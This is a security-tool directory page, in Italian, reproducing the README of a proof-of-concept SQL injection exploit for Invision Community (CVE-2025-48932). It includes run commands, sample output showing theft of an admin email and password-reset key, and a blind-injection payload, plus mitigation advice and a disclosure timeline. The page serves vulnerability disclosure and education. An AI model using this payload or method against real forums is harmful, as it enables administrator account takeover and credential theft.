Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-48932---exploit | Kitploit
Strumenti/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

Vedi Repository
29 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di SQL Injection per Invision Community (CVE-2025-48932)

Python Version License CVE

Un exploit proof-of-concept che dimostra una vulnerabilità di SQL injection in Invision Community versioni <= 4.7.20.

⚠️ Disclaimer

Questo strumento è fornito SOLO per scopi educativi e di test di sicurezza autorizzati.

  • L'accesso non autorizzato a sistemi informatici è ILLEGALE
  • Usa questo strumento solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta al test
  • L'autore NON È RESPONSABILE di qualsiasi uso improprio o danno causato da questo strumento
  • Questo strumento è destinato esclusivamente a ricercatori di sicurezza, penetration tester e scopi educativi

📋 Indice

  • Descrizione della vulnerabilità
  • Requisiti
  • Installazione
  • Utilizzo
  • Come funziona
  • Mitigazione
  • Crediti
  • Riferimenti

🔍 Descrizione della vulnerabilità

CVE ID: CVE-2025-48932
Gravità: Alta
Punteggio CVSS: TBD
Versioni interessate: Versioni di Invision Community 4.x precedenti alla 4.7.21

La vulnerabilità è presente nello script /applications/calendar/modules/front/calendar/view.php. L'input utente passato attraverso il parametro di richiesta location nel metodo IPS\calendar\modules\front\calendar\view::search() non viene correttamente sanificato prima di essere utilizzato nelle query SQL.

Ciò consente ad attaccanti remoti non autenticati di:

  • Estrarre dati sensibili dal database
  • Leggere le credenziali di amministratore
  • Riuscire potenzialmente a prendere il controllo dell'account amministratore

Prerequisiti per lo sfruttamento:

  • L'applicazione Calendar deve essere installata
  • La funzionalità GeoLocalizzazione (come Google Maps) deve essere configurata

Nota: Mentre le vulnerabilità di SQL injection nelle versioni di Invision Community 4.x < 4.7.18 potevano portare al takeover dell'account amministratore e alla RCE resettando la password dell'amministratore, la versione 4.7.18 ha introdotto una nuova chiave di crittografia di sicurezza nel meccanismo di reset della password, rendendo questo vettore d'attacco più difficile.

📦 Requisiti

  • Python 3.7 o superiore
  • pip (gestore dei pacchetti Python)
  • Connessione Internet
  • Sistema target che esegue Invision Community <= 4.7.20 con:
    • Applicazione Calendar installata
    • Funzionalità GeoLocalizzazione configurata

🚀 Installazione

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. Installa le dipendenze:

    root@kitploit:~
    pip install -r requirements.txt
    

💻 Utilizzo

Utilizzo base

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

Modalità verbosa (per debug)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

Argomenti da riga di comando

Output di esempio

root@kitploit:~
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Fetching CSRF token...
[+] CSRF token found: abc123def456...
[*] Step 1: Extracting admin email address...
[*] Extracting data: [email protected]
[+] Admin email: [email protected]

[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: [email protected]
3. Press ENTER when done...

[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789abc123...
[+] Reset key: xyz789abc123...
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    [email protected]
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/

🔬 Come funziona

L'exploit funziona in quattro passaggi principali:

1. Estrazione del token CSRF

Lo script recupera prima un token CSRF dal sito target, necessario per le richieste successive.

2. SQL injection blind basata su booleani

Utilizzando un algoritmo di ricerca binaria, l'exploit estrae i dati dal database carattere per carattere:

  • Testa ogni carattere utilizzando query SQL condizionali
  • Usa la funzione RLIKE con pattern regex per rilevare condizioni vere/false
  • I messaggi di errore indicano condizioni riuscite

3. Estrazione dell'email dell'amministratore

Interroga la tabella core_members per estrarre l'indirizzo email dell'amministratore.

4. Sfruttamento del reset della password

  • L'attaccante avvia manualmente un reset della password per l'account amministratore
  • L'exploit estrae la chiave di validazione del reset della password dal database
  • Usa la chiave di validazione per resettare la password dell'amministratore senza accesso all'email

Dettagli tecnici

Punto di iniezione:

root@kitploit:~
location parameter → calendar/view.php → search() method

Esempio di payload:

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

Tecnica di sfruttamento: SQL injection blind basata su booleani che utilizza la ricerca binaria per un'estrazione efficiente dei dati.

🛡️ Mitigazione

Per gli utenti

Azioni immediate:

  1. Aggiorna alla versione 4.7.21 o successiva - Questa versione corregge la vulnerabilità
  2. Disattiva l'applicazione Calendar se non in uso
  3. Monitora i log di accesso per attività sospette
  4. Controlla gli account amministratore per accessi non autorizzati

Per gli sviluppatori

Pratiche di codifica sicura:

  1. Usa query parametrizzate/prepared statement - Non concatenare mai l'input utente nelle query SQL
  2. Validazione degli input - Valida e sanifica tutti gli input utente
  3. Principio del privilegio minimo - Gli utenti del database dovrebbero avere solo i permessi minimi necessari
  4. Web Application Firewall (WAF) - Implementa regole WAF per rilevare tentativi di SQL injection
  5. Audit di sicurezza regolari - Esegui revisioni periodiche del codice e penetration test

Esempio di codice sicuro:

root@kitploit:~
// Vulnerable code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Secure code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 Cronologia della divulgazione

DataEvento
16 maggio 2025Fornitore notificato
27 maggio 2025Rilasciata la versione 4.7.21
28 maggio 2025

👏 Crediti

Sviluppatore:

  • nanda

Nota: Questa è un'implementazione indipendente basata sulle informazioni di vulnerabilità divulgate pubblicamente (CVE-2025-48932)

📚 Riferimenti

  • Dettagli CVE-2025-48932
  • Sito ufficiale di Invision Community
  • EDB-ID: 52383

📝 Licenza

Questo progetto è concesso in licenza secondo i termini della MIT License - consulta il file LICENSE per i dettagli.

🤝 Contributi

I contributi sono benvenuti! Non esitare a inviare una Pull Request. Per modifiche importanti, apri prima una issue per discutere cosa vorresti cambiare.

⚖️ Avviso legale

Questo strumento è distribuito sotto la MIT License. Utilizzando questo software, accetti di:

  1. Usarlo solo per scopi di test legali e autorizzati
  2. Assumerti piena responsabilità per le tue azioni
  3. Non ritenere l'autore responsabile per qualsiasi uso improprio o danno
  4. Rispettare tutte le leggi e normative applicabili

Ricorda: L'accesso non autorizzato a sistemi informatici è un reato nella maggior parte delle giurisdizioni e può comportare gravi conseguenze legali.


Se scopri una vulnerabilità di sicurezza, ti preghiamo di divulgarla responsabilmente al fornitore prima di renderla pubblica.

Scarica lo strumento
ArgomentoDescrizioneObbligatorio
-u, --urlURL di base dell'installazione Invision CommunitySì
-v, --verboseAbilita l'output verboso per il debugNo
-h, --helpMostra il messaggio di aiuto ed esciNo
Richiesto l'identificativo CVE
28 maggio 2025Assegnato CVE-2025-48932
23 luglio 2025Divulgazione pubblica